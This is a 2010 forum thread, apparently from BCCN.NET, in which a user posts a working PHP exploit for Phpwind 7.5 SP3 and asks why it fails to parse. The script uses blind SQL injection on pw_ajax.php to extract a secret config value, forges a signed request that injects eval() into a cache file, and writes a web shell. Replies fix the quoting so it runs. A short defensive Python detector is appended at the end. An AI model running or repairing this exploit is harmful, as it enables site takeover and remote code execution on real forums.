Title: PHP code throws an error.
shenyun345
<?php
error_reporting(0);
set_time_limit(0);
echo "
Info: Poc for Phpwind 7.5 SP3
Test: exp.php user password http://www.

";


if($argc<3){
    echo "\r\nexploit.php user password http://www.\r\n";
    die();
}
$user=$argv[1];
$pass=$argv[2];
$pwurl=$argv[3];
$myheader=array(
        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: zh-cn,zh;q=0.5',
        'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'Referer: http://www.',
        'Connection: Keep-Alive',
        'Cache-Control: no-cache',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
    );
$cookie="";
$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2Flocalhost%2Fuploadc&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);
preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);
for($i=0;$i<count($array[1]);$i++){
    $cookie=$cookie.";".$array[1][$i];
}
//echo $cookie;
$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);
if(strpos($test,'<ajax>')) {
    die('用户密码或者其他参数错误');
}

$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e%23";
$hash="0123456789abcdef";
$craked="";
for($i=0;$i<32;$i++){
    for($n=0;$n<16;$n++){
        $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);
        $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);
        if(strpos($tmp,"pw_config")){
            echo ">";
            $craked=$craked.$hash[$n];
            break;
        }
    }
}
if($craked=="") die("exploit failed\n");
echo "\nCraked Magicdata :".$craked."\r\n";
echo "Get shell :";

$arg='';
$hack = array();
$hack['mode'] = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_REQUEST[c]).\'abc";}}}';
$hack['type'] = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg.='sig='.md5($arg.$craked);
echo "OK\r\n";
$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if(strpos($str,'wooyun')){
    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>;";
    echo "\r\nOver!";
}
function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = strips($value);
        }
    } else {
        $param = stripslashes($param);
    }
    return $param;
}

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_POST, $method);
curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
    curl_setopt($ch,  CURLOPT_SSL_VERIFYPEER,  FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
return $handles;
}

Running this code in a PHP environment throws an error:
Parse error: syntax error, unexpected T_STRING, expecting ',' or ';'
Could an expert please take a look and fix it?
2010-09-06 22:08
shenyun345
It says the error is on line 98. Could everyone please help take a look?
The error output is:
Parse error: syntax error, unexpected T_STRING, expecting ',' or ';'
2010-09-06 22:09
asmdaydream
Line 75 already seems to have a problem:
if(strpos($str,'wooyun')){
    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>;";
    echo "\r\nOver!";
}

=<?fputs(fopen("xia.php","w")         The " character should probably be escaped with a backslash.

2010-09-07 00:08
gupiao175
echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>;";
Try changing it to this:
echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=<?fputs(fopen('xia.php','w');eval('$_POST[xia]');?>"

2010-09-07 01:39
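
Added example, not part of the thread and not code from any poster: a defender-side check, in Python, for the two request patterns the posted script generates, namely a `pcdelimg` call to `pw_ajax.php` whose `fieldname` is not a bare identifier, and a request carrying parameters to a PHP file under `data/bbscache/`. The record layout, the rule names and the benign field name `pcimg` are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample records: (method, request URI, url-encoded POST body).
# The tuple layout and the benign field name "pcimg" are assumptions.
SAMPLE_REQUESTS = [
    ("POST", "/pw_ajax.php", "action=pcdelimg&fieldname=pcimg"),
    ("POST", "/pw_ajax.php",
     "action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20"
     "db_name%20like%200x00%20union%20select%200x00%23"),
    ("GET", "/data/bbscache/info_class.php?c=echo%20test;", ""),
    ("GET", "/read.php?tid=12", ""),
]

IDENTIFIER = re.compile(r"[A-Za-z0-9_]+")
CACHE_PHP = re.compile(r"/data/bbscache/[^/]+\.php$")


def classify(method, uri, body):
    """Return the rule names one request triggers (empty list = clean)."""
    findings = []
    parts = urlsplit(uri)
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    if parts.path.endswith("/pw_ajax.php") and "pcdelimg" in form.get("action", []):
        # Assumption: a legitimate fieldname is a bare column identifier,
        # so spaces, '#' and similar characters never appear in it.
        if any(not IDENTIFIER.fullmatch(v) for v in form.get("fieldname", [])):
            findings.append("sqli-fieldname")
    # Cache files are meant to be included server-side; a direct request
    # that carries parameters is abnormal.
    if CACHE_PHP.search(parts.path) and (query or body):
        findings.append("bbscache-direct-exec")
    return findings


def scan(requests):
    """Return (uri, findings) for every request that triggers a rule."""
    hits = []
    for method, uri, body in requests:
        findings = classify(method, uri, body)
        if findings:
            hits.append((uri, findings))
    return hits


if __name__ == "__main__":
    for uri, findings in scan(SAMPLE_REQUESTS):
        print(uri, findings)
```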
Copyright©2004-2024, BCCN.NET, All Rights Reserved